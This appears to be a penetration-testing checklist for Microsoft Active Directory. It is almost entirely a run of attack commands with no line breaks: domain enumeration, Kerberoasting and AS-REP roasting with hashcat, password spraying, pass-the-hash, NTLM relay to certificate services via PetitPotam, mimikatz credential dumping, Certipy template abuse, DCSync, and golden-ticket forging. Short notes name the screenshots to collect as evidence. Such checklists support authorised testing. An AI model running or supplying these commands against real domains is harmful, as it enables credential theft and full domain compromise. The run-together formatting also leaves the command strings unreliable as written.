Active Directory Security Checklist
A targeted penetration testing checklist for Microsoft Active Directory environments. Covers domain enumeration, Kerberos attacks, ACL abuse, Group Policy exploitation, lateral movement, and domain dominance techniques used by real-world threat actors.
bloodhound-python -d corp.local -u user -p Password1 -ns 10.0.0.1 -c AllSharpHound.exe -c All --zipfilename collection.zipBloodHound graph screenshot showing the shortest path from a low-privilege user to Domain Admin, with each edge labelled.
net group "Domain Admins" /domaincrackmapexec ldap 10.0.0.1 -u user -p pass --groupsGetUserSPNs.py corp.local/user:Password1 -dc-ip 10.0.0.1Get-GPO -AllGet-LAPSPasswords.ps1crackmapexec ldap 10.0.0.1 -u user -p pass -M lapsGet-NetComputer -UnconstrainedfindDelegation.py corp.local/user:Password1GetUserSPNs.py corp.local/user:Password1 -dc-ip 10.0.0.1 -requesthashcat -m 13100 -a 0 hashes.txt /usr/share/wordlists/rockyou.txtoutput of GetUserSPNs.py with the captured TGS hash plus the hashcat result confirming the cracked plaintext password.
GetNPUsers.py corp.local/ -dc-ip 10.0.0.1 -usersfile users.txt -no-pass -format hashcathashcat -m 18200 -a 0 asrep.txt /usr/share/wordlists/rockyou.txtcrackmapexec smb 10.0.0.0/24 -u Administrator -H <ntlm_hash>evil-winrm -i 10.0.0.5 -u Administrator -H <ntlm_hash>kerbrute passwordspray --dc 10.0.0.1 -d corp.local users.txt "Spring2026!"crackmapexec smb 10.0.0.1 -u users.txt -p "Spring2026!" --continue-on-successntlmrelayx.py -t http://adcs.corp.local/certsrv/certfnsh.asp -smb2support --adcsPetitPotam.py <attacker_ip> <dc_ip>mimikatz "privilege::debug" "sekurlsa::logonpasswords" exitcertipy find -u user@corp.local -p Password1 -dc-ip 10.0.0.1 -vulnerablecertipy req -u user@corp.local -p Password1 -ca CORP-CA -template VulnerableTemplate -upn administrator@corp.localcertipy find output flagging the vulnerable template (ESC ID) plus the resulting issued certificate authenticating as Domain Admin.
secretsdump.py -just-dc corp.local/Administrator@10.0.0.1truncated secretsdump output showing DCSync replication succeeded and a sample of extracted NTLM hashes (with KRBTGT hash redacted as appropriate).
mimikatz "kerberos::golden /user:Administrator /domain:corp.local /sid:<SID> /krbtgt:<HASH> /ptt"